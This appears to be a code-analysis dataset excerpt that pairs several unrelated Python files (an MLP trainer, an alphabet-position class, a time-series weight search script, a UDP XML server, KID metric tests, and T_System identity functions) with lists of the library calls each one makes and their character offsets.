        # NOTE(review): the banner says 'PReLU' but the network uses a
        # fixed-slope (0.25) leaky ReLU -- confirm the intended wording.
        print('activation function: PReLU')
        print(nodes,"hidden nodes:")
MLP_train(train_imgs, train_labels, nodes, 30, test_imgs, test_labels) | [
"random.uniform",
"numpy.where",
"load_data.loadImage",
"numpy.tanh",
"random.seed",
"numpy.argmax",
"numpy.exp",
"numpy.zeros",
"numpy.dot",
"numpy.expand_dims",
"load_data.loadLabel"
] | [((630, 663), 'numpy.zeros', 'np.zeros', (['(hidden_nodes, size[1])'], {}), '((hidden_nodes, size[1]))\n', (638, 663), True, 'import numpy as np\n'), ((782, 810), 'numpy.zeros', 'np.zeros', (['(10, hidden_nodes)'], {}), '((10, hidden_nodes))\n', (790, 810), True, 'import numpy as np\n'), ((924, 946), 'numpy.zeros', 'np.zeros', (['hidden_nodes'], {}), '(hidden_nodes)\n', (932, 946), True, 'import numpy as np\n'), ((954, 966), 'numpy.zeros', 'np.zeros', (['(10)'], {}), '(10)\n', (962, 966), True, 'import numpy as np\n'), ((2043, 2079), 'load_data.loadImage', 'loadImage', (['"""train-images-idx3-ubyte"""'], {}), "('train-images-idx3-ubyte')\n", (2052, 2079), False, 'from load_data import loadLabel, loadImage\n'), ((2097, 2133), 'load_data.loadLabel', 'loadLabel', (['"""train-labels-idx1-ubyte"""'], {}), "('train-labels-idx1-ubyte')\n", (2106, 2133), False, 'from load_data import loadLabel, loadImage\n'), ((2148, 2183), 'load_data.loadImage', 'loadImage', (['"""t10k-images-idx3-ubyte"""'], {}), "('t10k-images-idx3-ubyte')\n", (2157, 2183), False, 'from load_data import loadLabel, loadImage\n'), ((2188, 2202), 'random.seed', 'random.seed', (['(2)'], {}), '(2)\n', (2199, 2202), False, 'import random\n'), ((2219, 2254), 'load_data.loadLabel', 'loadLabel', (['"""t10k-labels-idx1-ubyte"""'], {}), "('t10k-labels-idx1-ubyte')\n", (2228, 2254), False, 'from load_data import loadLabel, loadImage\n'), ((407, 417), 'numpy.tanh', 'np.tanh', (['x'], {}), '(x)\n', (414, 417), True, 'import numpy as np\n'), ((1598, 1621), 'numpy.dot', 'np.dot', (['w1', 'test_data.T'], {}), '(w1, test_data.T)\n', (1604, 1621), True, 'import numpy as np\n'), ((1621, 1647), 'numpy.expand_dims', 'np.expand_dims', (['b1'], {'axis': '(1)'}), '(b1, axis=1)\n', (1635, 1647), True, 'import numpy as np\n'), ((1699, 1717), 'numpy.dot', 'np.dot', (['w2', 'h_test'], {}), '(w2, h_test)\n', (1705, 1717), True, 'import numpy as np\n'), ((1717, 1743), 'numpy.expand_dims', 'np.expand_dims', (['b2'], {'axis': 
'(1)'}), '(b2, axis=1)\n', (1731, 1743), True, 'import numpy as np\n'), ((493, 522), 'numpy.where', 'np.where', (['(x <= 0)', '(0.25 * x)', 'x'], {}), '(x <= 0, 0.25 * x, x)\n', (501, 522), True, 'import numpy as np\n'), ((750, 775), 'random.uniform', 'random.uniform', (['(-0.4)', '(0.4)'], {}), '(-0.4, 0.4)\n', (764, 775), False, 'import random\n'), ((892, 917), 'random.uniform', 'random.uniform', (['(-0.4)', '(0.4)'], {}), '(-0.4, 0.4)\n', (906, 917), False, 'import random\n'), ((1858, 1883), 'numpy.argmax', 'np.argmax', (['output_test[i]'], {}), '(output_test[i])\n', (1867, 1883), True, 'import numpy as np\n'), ((1885, 1910), 'numpy.argmax', 'np.argmax', (['test_labels[i]'], {}), '(test_labels[i])\n', (1894, 1910), True, 'import numpy as np\n'), ((189, 199), 'numpy.tanh', 'np.tanh', (['x'], {}), '(x)\n', (196, 199), True, 'import numpy as np\n'), ((1045, 1060), 'numpy.dot', 'np.dot', (['w1', 'x.T'], {}), '(w1, x.T)\n', (1051, 1060), True, 'import numpy as np\n'), ((1116, 1129), 'numpy.dot', 'np.dot', (['w2', 'h'], {}), '(w2, h)\n', (1122, 1129), True, 'import numpy as np\n'), ((1286, 1306), 'numpy.dot', 'np.dot', (['w2.T', 'delta2'], {}), '(w2.T, delta2)\n', (1292, 1306), True, 'import numpy as np\n'), ((1330, 1360), 'numpy.expand_dims', 'np.expand_dims', (['delta1'], {'axis': '(1)'}), '(delta1, axis=1)\n', (1344, 1360), True, 'import numpy as np\n'), ((1360, 1385), 'numpy.expand_dims', 'np.expand_dims', (['x'], {'axis': '(0)'}), '(x, axis=0)\n', (1374, 1385), True, 'import numpy as np\n'), ((1410, 1440), 'numpy.expand_dims', 'np.expand_dims', (['delta2'], {'axis': '(1)'}), '(delta2, axis=1)\n', (1424, 1440), True, 'import numpy as np\n'), ((1440, 1465), 'numpy.expand_dims', 'np.expand_dims', (['h'], {'axis': '(0)'}), '(h, axis=0)\n', (1454, 1465), True, 'import numpy as np\n'), ((456, 466), 'numpy.exp', 'np.exp', (['(-x)'], {}), '(-x)\n', (462, 466), True, 'import numpy as np\n'), ((243, 253), 'numpy.exp', 'np.exp', (['(-x)'], {}), '(-x)\n', (249, 253), True, 
'import numpy as np\n'), ((264, 274), 'numpy.exp', 'np.exp', (['(-x)'], {}), '(-x)\n', (270, 274), True, 'import numpy as np\n')] |
import re
class AlphabetPosition:
alphabet = {
'a': 1,
'b': 2,
'c': 3,
'd': 4,
'e': 5,
'f': 6,
'g': 7,
'h': 8,
'i': 9,
'j': 10,
'k': 11,
'l': 12,
'm': 13,
'n': 14,
'o': 15,
'p': 16,
'q': 17,
'r': 18,
's': 19,
't': 20,
'u': 21,
'v': 22,
'w': 23,
'x': 24,
'y': 25,
'z': 26,
}
def find_position(self, sentence: str):
# Convert all letters to lowercase
sentence = sentence.lower()
# Remove all spaces and split sentence to list of chars
sentence = sentence.replace(" ", "")
# Extract only letters
characters = ''.join(re.findall("[a-zA-Z]+", sentence))
# Make string into list of characters
characters = list(characters)
# Initiate an empty list to save all positions of the characters in
positions = []
# Iterate through each character and find its position in the alphabet.
# once found replace the character with it's relevant position number
for character in characters:
positions.append(self.alphabet.get(character))
# Convert list of integers to single string
return ' '.join(map(str, positions))
| [
"re.findall"
] | [((786, 819), 're.findall', 're.findall', (['"""[a-zA-Z]+"""', 'sentence'], {}), "('[a-zA-Z]+', sentence)\n", (796, 819), False, 'import re\n')] |
from utils import (load_data, data_to_series_features,
apply_weight, is_minimum)
from algorithm import (initialize_weights, individual_to_key,
pop_to_weights, select, reconstruct_population)
from sklearn.metrics import mean_squared_error, mean_absolute_error
from tensorflow.keras import optimizers
from tensorflow.keras.models import clone_model
import argparse
import math
import numpy as np
from model import make_model
from copy import copy
from sklearn.model_selection import train_test_split
def parse_arguments(argv=None):
    """Build and parse the command-line arguments for the experiment.

    Args:
        argv (list of str, optional): Argument list to parse. Defaults to
            ``None``, in which case argparse falls back to ``sys.argv[1:]``
            (so existing callers are unaffected).

    Returns:
        argparse.Namespace: Parsed experiment settings.
    """
    parser = argparse.ArgumentParser(description="Specify Params for Experimental Setting")
    parser.add_argument('--iterations', type=int, default=20,
                        help="Specify the number of evolution iterations")
    parser.add_argument('--batch_size', type=int, default=256,
                        help="Specify batch size")
    parser.add_argument('--initial_epochs', type=int, default=100,
                        help="Specify the number of epochs for initial training")
    parser.add_argument('--num_epochs', type=int, default=20,
                        help="Specify the number of epochs for competitive search")
    parser.add_argument('--log_step', type=int, default=100,
                        help="Specify log step size for training")
    parser.add_argument('--learning_rate', type=float, default=1e-3,
                        help="Learning rate")
    parser.add_argument('--data', type=str, default='pollution.csv',
                        help="Path to the dataset")
    # Competitive-random-search hyperparameters.
    parser.add_argument('--pop_size', type=int, default=36)
    parser.add_argument('--code_length', type=int, default=6)
    parser.add_argument('--n_select', type=int, default=6)
    # Model / series hyperparameters.
    parser.add_argument('--time_steps', type=int, default=18)
    parser.add_argument('--n_hidden', type=int, default=128)
    parser.add_argument('--n_output', type=int, default=1)
    parser.add_argument('--max_grad_norm', type=float, default=1.0)
    return parser.parse_args(argv)
def main():
    """Run the full experiment: initial training, then competitive random
    search over per-time-step input weightings, then a final test evaluation."""
    args = parse_arguments()
    data, y_scaler = load_data(args.data)
    args.n_features = np.size(data, axis=-1)
    X, y = data_to_series_features(data, args.time_steps)
    # 70/15/15 split: 30% is held out, then halved into validation and test.
    train_X, X, train_y, y = train_test_split(X, y, test_size=0.3)
    valid_X, test_X, valid_y, test_y = train_test_split(X, y, test_size=0.5)
    optimizer = optimizers.Adam(learning_rate=args.learning_rate, clipnorm=args.max_grad_norm)
    best_model = make_model(args)
    # Start from a uniform weighting over all time steps.
    best_weight = [1.0] * args.time_steps
    best_model.compile(loss='mse', optimizer=optimizer)
    print("Initial training before competitive random search")
    best_model.fit(apply_weight(train_X, best_weight), train_y, epochs=args.initial_epochs,
                   validation_data=(apply_weight(valid_X, best_weight), valid_y), shuffle=True)
    print("\nInitial training is done. Start competitive random search.\n")
    pop, weights = initialize_weights(args.pop_size, args.time_steps, args.code_length)
    # Cache individual-key -> validation RMSE so duplicate individuals are not retrained.
    key_to_rmse = {}
    for iteration in range(args.iterations):
        for enum, (indiv, weight) in enumerate(zip(pop, weights)):
            print('iteration: [%d/%d] indiv_no: [%d/%d]' % (iteration + 1, args.iterations, enum + 1, args.pop_size))
            key = individual_to_key(indiv)
            if key not in key_to_rmse.keys():
                # Fine-tune a fresh copy of the current best model under this weighting.
                model = make_model(args)
                model.compile(loss='mse', optimizer=optimizer)
                model.set_weights(best_model.get_weights())
                model.fit(apply_weight(train_X, weight), train_y, epochs=args.num_epochs,
                          validation_data=(apply_weight(valid_X, weight), valid_y), shuffle=True)
                pred_y = model.predict(apply_weight(valid_X, weight))
                # Evaluate in the original (inverse-scaled) units.
                inv_pred_y = y_scaler.inverse_transform(pred_y)
                inv_valid_y = y_scaler.inverse_transform(np.expand_dims(valid_y, axis=1))
                rmse = math.sqrt(mean_squared_error(inv_valid_y, inv_pred_y))
                mae = mean_absolute_error(inv_valid_y, inv_pred_y)
                print("RMSE: %.4f, MAE: %.4f" % (rmse, mae))
                if is_minimum(rmse, key_to_rmse):
                    # New best individual so far: keep its trained weights.
                    best_model.set_weights(model.get_weights())
                    best_weight = copy(weight)
                key_to_rmse[key] = rmse
        # Select the fittest individuals and rebuild the population from them.
        pop_selected, fitness_selected = select(pop, args.n_select, key_to_rmse)
        pop = reconstruct_population(pop_selected, args.pop_size)
        weights = pop_to_weights(pop, args.time_steps, args.code_length)
    print('test evaluation:')
    pred_y = best_model.predict(apply_weight(test_X, best_weight))
    inv_pred_y = y_scaler.inverse_transform(pred_y)
    inv_test_y = y_scaler.inverse_transform(np.expand_dims(test_y, axis=1))
    rmse = math.sqrt(mean_squared_error(inv_test_y, inv_pred_y))
    mae = mean_absolute_error(inv_test_y, inv_pred_y)
    print("RMSE: %.4f, MAE: %.4f" % (rmse, mae))
if __name__ == '__main__':
    # Script entry point.
    main()
| [
"utils.data_to_series_features",
"utils.is_minimum",
"utils.load_data",
"argparse.ArgumentParser",
"sklearn.model_selection.train_test_split",
"algorithm.initialize_weights",
"numpy.size",
"algorithm.individual_to_key",
"algorithm.pop_to_weights",
"model.make_model",
"algorithm.select",
"tenso... | [((601, 679), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Specify Params for Experimental Setting"""'}), "(description='Specify Params for Experimental Setting')\n", (624, 679), False, 'import argparse\n'), ((2118, 2138), 'utils.load_data', 'load_data', (['args.data'], {}), '(args.data)\n', (2127, 2138), False, 'from utils import load_data, data_to_series_features, apply_weight, is_minimum\n'), ((2161, 2183), 'numpy.size', 'np.size', (['data'], {'axis': '(-1)'}), '(data, axis=-1)\n', (2168, 2183), True, 'import numpy as np\n'), ((2195, 2241), 'utils.data_to_series_features', 'data_to_series_features', (['data', 'args.time_steps'], {}), '(data, args.time_steps)\n', (2218, 2241), False, 'from utils import load_data, data_to_series_features, apply_weight, is_minimum\n'), ((2271, 2308), 'sklearn.model_selection.train_test_split', 'train_test_split', (['X', 'y'], {'test_size': '(0.3)'}), '(X, y, test_size=0.3)\n', (2287, 2308), False, 'from sklearn.model_selection import train_test_split\n'), ((2348, 2385), 'sklearn.model_selection.train_test_split', 'train_test_split', (['X', 'y'], {'test_size': '(0.5)'}), '(X, y, test_size=0.5)\n', (2364, 2385), False, 'from sklearn.model_selection import train_test_split\n'), ((2403, 2481), 'tensorflow.keras.optimizers.Adam', 'optimizers.Adam', ([], {'learning_rate': 'args.learning_rate', 'clipnorm': 'args.max_grad_norm'}), '(learning_rate=args.learning_rate, clipnorm=args.max_grad_norm)\n', (2418, 2481), False, 'from tensorflow.keras import optimizers\n'), ((2499, 2515), 'model.make_model', 'make_model', (['args'], {}), '(args)\n', (2509, 2515), False, 'from model import make_model\n'), ((2961, 3029), 'algorithm.initialize_weights', 'initialize_weights', (['args.pop_size', 'args.time_steps', 'args.code_length'], {}), '(args.pop_size, args.time_steps, args.code_length)\n', (2979, 3029), False, 'from algorithm import initialize_weights, individual_to_key, pop_to_weights, select, 
reconstruct_population\n'), ((4875, 4918), 'sklearn.metrics.mean_absolute_error', 'mean_absolute_error', (['inv_test_y', 'inv_pred_y'], {}), '(inv_test_y, inv_pred_y)\n', (4894, 4918), False, 'from sklearn.metrics import mean_squared_error, mean_absolute_error\n'), ((2696, 2730), 'utils.apply_weight', 'apply_weight', (['train_X', 'best_weight'], {}), '(train_X, best_weight)\n', (2708, 2730), False, 'from utils import load_data, data_to_series_features, apply_weight, is_minimum\n'), ((4395, 4434), 'algorithm.select', 'select', (['pop', 'args.n_select', 'key_to_rmse'], {}), '(pop, args.n_select, key_to_rmse)\n', (4401, 4434), False, 'from algorithm import initialize_weights, individual_to_key, pop_to_weights, select, reconstruct_population\n'), ((4449, 4500), 'algorithm.reconstruct_population', 'reconstruct_population', (['pop_selected', 'args.pop_size'], {}), '(pop_selected, args.pop_size)\n', (4471, 4500), False, 'from algorithm import initialize_weights, individual_to_key, pop_to_weights, select, reconstruct_population\n'), ((4519, 4573), 'algorithm.pop_to_weights', 'pop_to_weights', (['pop', 'args.time_steps', 'args.code_length'], {}), '(pop, args.time_steps, args.code_length)\n', (4533, 4573), False, 'from algorithm import initialize_weights, individual_to_key, pop_to_weights, select, reconstruct_population\n'), ((4637, 4670), 'utils.apply_weight', 'apply_weight', (['test_X', 'best_weight'], {}), '(test_X, best_weight)\n', (4649, 4670), False, 'from utils import load_data, data_to_series_features, apply_weight, is_minimum\n'), ((4768, 4798), 'numpy.expand_dims', 'np.expand_dims', (['test_y'], {'axis': '(1)'}), '(test_y, axis=1)\n', (4782, 4798), True, 'import numpy as np\n'), ((4821, 4863), 'sklearn.metrics.mean_squared_error', 'mean_squared_error', (['inv_test_y', 'inv_pred_y'], {}), '(inv_test_y, inv_pred_y)\n', (4839, 4863), False, 'from sklearn.metrics import mean_squared_error, mean_absolute_error\n'), ((3299, 3323), 'algorithm.individual_to_key', 
'individual_to_key', (['indiv'], {}), '(indiv)\n', (3316, 3323), False, 'from algorithm import initialize_weights, individual_to_key, pop_to_weights, select, reconstruct_population\n'), ((2805, 2839), 'utils.apply_weight', 'apply_weight', (['valid_X', 'best_weight'], {}), '(valid_X, best_weight)\n', (2817, 2839), False, 'from utils import load_data, data_to_series_features, apply_weight, is_minimum\n'), ((3394, 3410), 'model.make_model', 'make_model', (['args'], {}), '(args)\n', (3404, 3410), False, 'from model import make_model\n'), ((4046, 4090), 'sklearn.metrics.mean_absolute_error', 'mean_absolute_error', (['inv_valid_y', 'inv_pred_y'], {}), '(inv_valid_y, inv_pred_y)\n', (4065, 4090), False, 'from sklearn.metrics import mean_squared_error, mean_absolute_error\n'), ((4171, 4200), 'utils.is_minimum', 'is_minimum', (['rmse', 'key_to_rmse'], {}), '(rmse, key_to_rmse)\n', (4181, 4200), False, 'from utils import load_data, data_to_series_features, apply_weight, is_minimum\n'), ((3560, 3589), 'utils.apply_weight', 'apply_weight', (['train_X', 'weight'], {}), '(train_X, weight)\n', (3572, 3589), False, 'from utils import load_data, data_to_series_features, apply_weight, is_minimum\n'), ((3761, 3790), 'utils.apply_weight', 'apply_weight', (['valid_X', 'weight'], {}), '(valid_X, weight)\n', (3773, 3790), False, 'from utils import load_data, data_to_series_features, apply_weight, is_minimum\n'), ((3913, 3944), 'numpy.expand_dims', 'np.expand_dims', (['valid_y'], {'axis': '(1)'}), '(valid_y, axis=1)\n', (3927, 3944), True, 'import numpy as np\n'), ((3979, 4022), 'sklearn.metrics.mean_squared_error', 'mean_squared_error', (['inv_valid_y', 'inv_pred_y'], {}), '(inv_valid_y, inv_pred_y)\n', (3997, 4022), False, 'from sklearn.metrics import mean_squared_error, mean_absolute_error\n'), ((4300, 4312), 'copy.copy', 'copy', (['weight'], {}), '(weight)\n', (4304, 4312), False, 'from copy import copy\n'), ((3667, 3696), 'utils.apply_weight', 'apply_weight', (['valid_X', 'weight'], 
{}), '(valid_X, weight)\n', (3679, 3696), False, 'from utils import load_data, data_to_series_features, apply_weight, is_minimum\n')] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
import socketserver
from lxml import etree
class UdpHandler(socketserver.BaseRequestHandler):
    """Handles one incoming UDP datagram: logs it, then hands the payload
    to the owning server's decode_xml()."""
    def handle(self):
        # For UDP servers, self.request is a (data, socket) pair.
        data = self.request[0].strip()
        print("{} wrote:".format(self.client_address[0]))
        print(data)
        # Delegate payload parsing to the UdpServer instance.
        self.server.decode_xml(data)
class UdpServer(socketserver.UDPServer):
    """UDP server that parses each received datagram as XML and prints the
    text of its <delta> element."""
    def __init__(self, server_address, RequestHandlerClass):
        socketserver.UDPServer.__init__(self, server_address,
                                        RequestHandlerClass)
        # NOTE(review): no reader of self.a in this file — confirm it is
        # used elsewhere before removing.
        self.a = 1
    def decode_xml(self, xml):
        """Parse *xml* (bytes/str) and print the <delta> element's text."""
        root = etree.fromstring(xml)
        # NOTE(review): raises AttributeError if the payload has no <delta>
        # element — confirm all expected payloads carry one.
        print(root.find('delta').text)
if __name__ == "__main__":
    # Port can be overridden via the first CLI argument; defaults to 9900.
    if len(sys.argv) > 1:
        port = int(sys.argv[1])
    else:
        port = 9900
    host = "localhost"
    print("udp server listening on port {}".format(port))
    server = UdpServer((host, port), UdpHandler)
    # Blocks forever, dispatching each datagram to UdpHandler.handle().
    server.serve_forever()
| [
"socketserver.UDPServer.__init__",
"lxml.etree.fromstring"
] | [((441, 515), 'socketserver.UDPServer.__init__', 'socketserver.UDPServer.__init__', (['self', 'server_address', 'RequestHandlerClass'], {}), '(self, server_address, RequestHandlerClass)\n', (472, 515), False, 'import socketserver\n'), ((622, 643), 'lxml.etree.fromstring', 'etree.fromstring', (['xml'], {}), '(xml)\n', (638, 643), False, 'from lxml import etree\n')] |
import os
import shutil
import tensorflow as tf
import torch
from torch_mimicry.metrics import compute_kid
from torch_mimicry.metrics.inception_model import inception_utils
from torch_mimicry.nets.gan import gan
class ExampleGen(gan.BaseGenerator):
    """Stub generator for testing: ignores the latent input's content and
    always emits constant all-ones 3x32x32 images."""
    def __init__(self,
                 bottom_width=4,
                 nz=4,
                 ngf=256,
                 loss_type='gan',
                 *args,
                 **kwargs):
        super().__init__(nz=nz,
                         ngf=ngf,
                         bottom_width=bottom_width,
                         loss_type=loss_type,
                         *args,
                         **kwargs)
    def forward(self, x):
        # Batch size follows the input; pixel values are all ones.
        output = torch.ones(x.shape[0], 3, 32, 32)
        return output
class TestComputeKID:
    """Smoke tests for the KID (Kernel Inception Distance) metric helpers,
    driven by the constant-output ExampleGen generator on CPU."""
    def setup(self):
        self.netG = ExampleGen()
        self.num_subsets = 10
        self.subset_size = 5
        # KID draws num_subsets subsets of subset_size samples each.
        self.num_samples = self.subset_size * self.num_subsets
        self.device = torch.device("cpu")
        # Create inception graph once.
        self.inception_path = './metrics/inception_model'
        if not os.path.exists(self.inception_path):
            os.makedirs(self.inception_path)
        inception_utils.create_inception_graph(self.inception_path)
        # Directory
        self.log_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)),
                                    "test_log")
        if not os.path.exists(self.log_dir):
            os.makedirs(self.log_dir)
    def test_compute_gen_dist_feat(self):
        # device.index is None for CPU, so the GPU branch is skipped there.
        if self.device.index is not None:
            # Avoid unbounded memory usage
            gpu_options = tf.GPUOptions(allow_growth=True,
                                        per_process_gpu_memory_fraction=0.15,
                                        visible_device_list=str(
                                            self.device.index))
            config = tf.ConfigProto(gpu_options=gpu_options)
        else:
            config = tf.ConfigProto(device_count={'GPU': 0})
        with tf.compat.v1.Session(config=config) as sess:
            sess.run(tf.compat.v1.global_variables_initializer())
            fake_feat = compute_kid.compute_gen_dist_feat(
                netG=self.netG,
                num_samples=self.num_samples,
                sess=sess,
                seed=0,
                device=self.device,
                batch_size=10,
                print_every=1)
            # 2048 is the Inception pool feature width used by KID.
            assert fake_feat.shape == (self.num_samples, 2048)
    def test_compute_real_dist_feat(self):
        if self.device.index is not None:
            # Avoid unbounded memory usage
            gpu_options = tf.GPUOptions(allow_growth=True,
                                        per_process_gpu_memory_fraction=0.15,
                                        visible_device_list=str(
                                            self.device.index))
            config = tf.ConfigProto(gpu_options=gpu_options)
        else:
            config = tf.ConfigProto(device_count={'GPU': 0})
        with tf.compat.v1.Session(config=config) as sess:
            sess.run(tf.compat.v1.global_variables_initializer())
            real_feat = compute_kid.compute_real_dist_feat(
                num_samples=self.num_samples,
                sess=sess,
                dataset_name='fake_data',
                batch_size=10,
                log_dir=self.log_dir)
            print(real_feat.shape)
            assert real_feat.shape == (self.num_samples, 2048)
    def test_kid_score(self):
        # End-to-end: expects a (score, variance) float pair.
        score, var = compute_kid.kid_score(num_subsets=self.num_subsets,
                                           subset_size=self.subset_size,
                                           netG=self.netG,
                                           device=self.device,
                                           dataset_name='fake_data',
                                           batch_size=10,
                                           log_dir=self.log_dir,
                                           seed=0)
        assert type(score) == float
        assert type(var) == float
    def teardown(self):
        # Remove the per-run log directory and release the generator.
        shutil.rmtree(self.log_dir)
        del self.netG
if __name__ == "__main__":
    # Run the full test sequence manually (outside a test runner).
    test = TestComputeKID()
    test.setup()
    test.test_compute_gen_dist_feat()
    test.test_compute_real_dist_feat()
    test.test_kid_score()
    test.teardown()
| [
"torch_mimicry.metrics.compute_kid.compute_gen_dist_feat",
"os.path.exists",
"torch.ones",
"os.makedirs",
"torch_mimicry.metrics.inception_model.inception_utils.create_inception_graph",
"torch_mimicry.metrics.compute_kid.kid_score",
"torch_mimicry.metrics.compute_kid.compute_real_dist_feat",
"shutil.r... | [((719, 752), 'torch.ones', 'torch.ones', (['x.shape[0]', '(3)', '(32)', '(32)'], {}), '(x.shape[0], 3, 32, 32)\n', (729, 752), False, 'import torch\n'), ((998, 1017), 'torch.device', 'torch.device', (['"""cpu"""'], {}), "('cpu')\n", (1010, 1017), False, 'import torch\n'), ((1222, 1281), 'torch_mimicry.metrics.inception_model.inception_utils.create_inception_graph', 'inception_utils.create_inception_graph', (['self.inception_path'], {}), '(self.inception_path)\n', (1260, 1281), False, 'from torch_mimicry.metrics.inception_model import inception_utils\n'), ((3575, 3773), 'torch_mimicry.metrics.compute_kid.kid_score', 'compute_kid.kid_score', ([], {'num_subsets': 'self.num_subsets', 'subset_size': 'self.subset_size', 'netG': 'self.netG', 'device': 'self.device', 'dataset_name': '"""fake_data"""', 'batch_size': '(10)', 'log_dir': 'self.log_dir', 'seed': '(0)'}), "(num_subsets=self.num_subsets, subset_size=self.\n subset_size, netG=self.netG, device=self.device, dataset_name=\n 'fake_data', batch_size=10, log_dir=self.log_dir, seed=0)\n", (3596, 3773), False, 'from torch_mimicry.metrics import compute_kid\n'), ((4169, 4196), 'shutil.rmtree', 'shutil.rmtree', (['self.log_dir'], {}), '(self.log_dir)\n', (4182, 4196), False, 'import shutil\n'), ((1132, 1167), 'os.path.exists', 'os.path.exists', (['self.inception_path'], {}), '(self.inception_path)\n', (1146, 1167), False, 'import os\n'), ((1181, 1213), 'os.makedirs', 'os.makedirs', (['self.inception_path'], {}), '(self.inception_path)\n', (1192, 1213), False, 'import os\n'), ((1446, 1474), 'os.path.exists', 'os.path.exists', (['self.log_dir'], {}), '(self.log_dir)\n', (1460, 1474), False, 'import os\n'), ((1488, 1513), 'os.makedirs', 'os.makedirs', (['self.log_dir'], {}), '(self.log_dir)\n', (1499, 1513), False, 'import os\n'), ((1929, 1968), 'tensorflow.ConfigProto', 'tf.ConfigProto', ([], {'gpu_options': 'gpu_options'}), '(gpu_options=gpu_options)\n', (1943, 1968), True, 'import tensorflow as tf\n'), 
((2005, 2044), 'tensorflow.ConfigProto', 'tf.ConfigProto', ([], {'device_count': "{'GPU': 0}"}), "(device_count={'GPU': 0})\n", (2019, 2044), True, 'import tensorflow as tf\n'), ((2059, 2094), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {'config': 'config'}), '(config=config)\n', (2079, 2094), True, 'import tensorflow as tf\n'), ((2195, 2352), 'torch_mimicry.metrics.compute_kid.compute_gen_dist_feat', 'compute_kid.compute_gen_dist_feat', ([], {'netG': 'self.netG', 'num_samples': 'self.num_samples', 'sess': 'sess', 'seed': '(0)', 'device': 'self.device', 'batch_size': '(10)', 'print_every': '(1)'}), '(netG=self.netG, num_samples=self.\n num_samples, sess=sess, seed=0, device=self.device, batch_size=10,\n print_every=1)\n', (2228, 2352), False, 'from torch_mimicry.metrics import compute_kid\n'), ((2937, 2976), 'tensorflow.ConfigProto', 'tf.ConfigProto', ([], {'gpu_options': 'gpu_options'}), '(gpu_options=gpu_options)\n', (2951, 2976), True, 'import tensorflow as tf\n'), ((3013, 3052), 'tensorflow.ConfigProto', 'tf.ConfigProto', ([], {'device_count': "{'GPU': 0}"}), "(device_count={'GPU': 0})\n", (3027, 3052), True, 'import tensorflow as tf\n'), ((3067, 3102), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {'config': 'config'}), '(config=config)\n', (3087, 3102), True, 'import tensorflow as tf\n'), ((3203, 3345), 'torch_mimicry.metrics.compute_kid.compute_real_dist_feat', 'compute_kid.compute_real_dist_feat', ([], {'num_samples': 'self.num_samples', 'sess': 'sess', 'dataset_name': '"""fake_data"""', 'batch_size': '(10)', 'log_dir': 'self.log_dir'}), "(num_samples=self.num_samples, sess=sess,\n dataset_name='fake_data', batch_size=10, log_dir=self.log_dir)\n", (3237, 3345), False, 'from torch_mimicry.metrics import compute_kid\n'), ((1355, 1380), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (1370, 1380), False, 'import os\n'), ((2125, 2168), 'tensorflow.compat.v1.global_variables_initializer', 
'tf.compat.v1.global_variables_initializer', ([], {}), '()\n', (2166, 2168), True, 'import tensorflow as tf\n'), ((3133, 3176), 'tensorflow.compat.v1.global_variables_initializer', 'tf.compat.v1.global_variables_initializer', ([], {}), '()\n', (3174, 3176), True, 'import tensorflow as tf\n')] |
#!/usr/bin/python3
# -*- coding: utf-8 -*-
"""
.. module:: identity
:platform: Unix
:synopsis: the top-level submodule of T_System's remote_ui that contains the functions for realizing identity process of T_System.
.. moduleauthor:: <NAME> <<EMAIL>>
"""
from t_system.administration import is_admin
from t_system import identifier
from t_system import log_manager
# Module-level logger for the remote_ui identity helpers.
logger = log_manager.get_logger(__name__, "DEBUG")
def get_identity_info(admin_id):
    """Method to get identity information of T_System.

    Args:
        admin_id (str): Root privileges flag.

    Returns:
        dict: public_id, private_id and name; private_id is only filled in
        for verified administrators, otherwise it stays None.
    """
    info = {"public_id": identifier.public_id, "private_id": None, "name": identifier.name}
    # The private id is disclosed only to a verified administrator.
    if admin_id and is_admin(admin_id):
        info["private_id"] = identifier.private_id
    return info
def update_identity(admin_id, cause, data):
    """Method to update identity information of T_System as given parameters.

    Args:
        admin_id (str): Root privileges flag.
        cause (str): Key that will be changed ("public_id", "private_id" or "name").
                     If falsy, all keys are updated at once.
        data (dict): Identity data structure.

    Returns:
        bool: result of the underlying `identifier.change_keys` call, or
        False when root privileges are missing or `cause` is unknown.
    """
    root = is_admin(admin_id)
    if cause:
        # Targeted single-key updates require root privileges.
        if not root:
            return False
        # Propagate change_keys' result instead of always returning True,
        # consistent with the bulk-update path below.
        if cause == "public_id":
            return identifier.change_keys(public_id=data["public_id"])
        elif cause == "private_id":
            return identifier.change_keys(private_id=data["private_id"])
        elif cause == "name":
            return identifier.change_keys(name=data["name"])
        # Unknown cause key: previously this silently reported success.
        return False
    if root:
        # Bulk update of all identity keys.
        return identifier.change_keys(data["public_id"], data["private_id"], data["name"])
    # Non-admins may only change the display name.
    return identifier.change_keys(name=data["name"])
| [
"t_system.log_manager.get_logger",
"t_system.identifier.change_keys",
"t_system.administration.is_admin"
] | [((386, 427), 't_system.log_manager.get_logger', 'log_manager.get_logger', (['__name__', '"""DEBUG"""'], {}), "(__name__, 'DEBUG')\n", (408, 427), False, 'from t_system import log_manager\n'), ((1197, 1215), 't_system.administration.is_admin', 'is_admin', (['admin_id'], {}), '(admin_id)\n', (1205, 1215), False, 'from t_system.administration import is_admin\n'), ((729, 747), 't_system.administration.is_admin', 'is_admin', (['admin_id'], {}), '(admin_id)\n', (737, 747), False, 'from t_system.administration import is_admin\n'), ((1503, 1544), 't_system.identifier.change_keys', 'identifier.change_keys', ([], {'name': "data['name']"}), "(name=data['name'])\n", (1525, 1544), False, 'from t_system import identifier\n'), ((1634, 1709), 't_system.identifier.change_keys', 'identifier.change_keys', (["data['public_id']", "data['private_id']", "data['name']"], {}), "(data['public_id'], data['private_id'], data['name'])\n", (1656, 1709), False, 'from t_system import identifier\n'), ((1745, 1786), 't_system.identifier.change_keys', 'identifier.change_keys', ([], {'name': "data['name']"}), "(name=data['name'])\n", (1767, 1786), False, 'from t_system import identifier\n'), ((1301, 1352), 't_system.identifier.change_keys', 'identifier.change_keys', ([], {'public_id': "data['public_id']"}), "(public_id=data['public_id'])\n", (1323, 1352), False, 'from t_system import 